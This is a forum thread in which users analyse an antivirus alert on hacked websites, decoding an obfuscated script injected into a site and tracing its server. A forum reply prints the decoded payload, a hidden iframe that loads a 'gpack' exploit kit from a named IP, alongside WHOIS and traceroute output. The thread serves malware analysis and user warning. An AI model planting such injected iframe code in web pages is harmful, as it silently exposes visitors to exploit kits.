foxsteve
Premium
join:2001-12-28
Campbell, CA
1 edit | reply to bobince
Re: Question about HTML/Framer.Z
If this is information from Piu Lo 
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
....
>tracert 58.65.232.33
Tracing route to oracle.dmain.name [58.65.232.33]
over a maximum of 30 hops:
...............
8 126 ms 127 ms 127 ms po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146]
9 183 ms 185 ms 183 ms gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93]
10 190 ms 188 ms 190 ms po15-0.gw2.hkg3.asianetcom.net [202.147.16.210]
11 187 ms 186 ms 187 ms HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90]
12 187 ms 186 ms 187 ms 58.65.235.230
13 186 ms 187 ms 187 ms 116.50.12.10
14 182 ms 183 ms 184 ms oracle.dmain.name [58.65.232.33] |
|
bobince
join:2002-04-19
DE
| reply to foxsteve
quote:
As you see that server is located in Hong-Kong and it is not Russia
True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK.
HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell. |
|
foxsteve
Premium
join:2001-12-28
Campbell, CA
4 edits | reply to no_one
That sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here
window.status='Done';document.write('<iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*43280)+'8b6\' width=541 height=80 style=\'display: none\'></iframe>')
Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name.
Additional information.
This IP is allocated to APNIC (Asia Pacific Network Information Centre)
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
inetnum: 58.65.232.0 - 58.65.239.255
netname: HOSTFRESH
descr: Internet Service Provider
status: ALLOCATED PORTABLE
person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php
PS. For bobince 
As you see that server is located in Hong-Kong and it is not Russia. :) |
|
mpw101
@cableone.net | reply to zteardrop
Re: Question about HTML/Framer.Z
AVG 7.5 free addition is alerting to HTML/Framer.Z on this site: www.pci-golf.com. |
|
bobince
join:2002-04-19
DE
| reply to zteardrop
quote:
only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it
Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up.
Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable).
So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is:
{script}eval(unescape("%77%69%6e%64%6f%77%2e...
Code like this is an immediate big red flag.
Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times. |
|
DocHoliday
@qwest.net | reply to zteardrop
I get the same virus notice from my AVG. I googled Tiger Jimmy tattoos. When at the site, i got the same message 3 times. AVG said it healed the virus. It did come up after running AVG. |
|
Sarah
Premium,ExMod 2002-05
join:2001-01-09
Cambridge, MA
clubs:
| reply to zteardrop
The page is gone now so there's nothing left to look at... he just tacked up a placeholder message saying it will be back up soon when he fixes it.
But that is good info re: Norton, I know my friend was using a recent version of Firefox so it's probably less likely to be vulnerable.
--
Killers and liars welcome |
|
zteardrop
join:2005-12-20
Brooklyn, NY | reply to Sarah
FYI.. only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it. Its hard to say if its an FP without the URL. If you can PM me the URL I can take a look. |
|
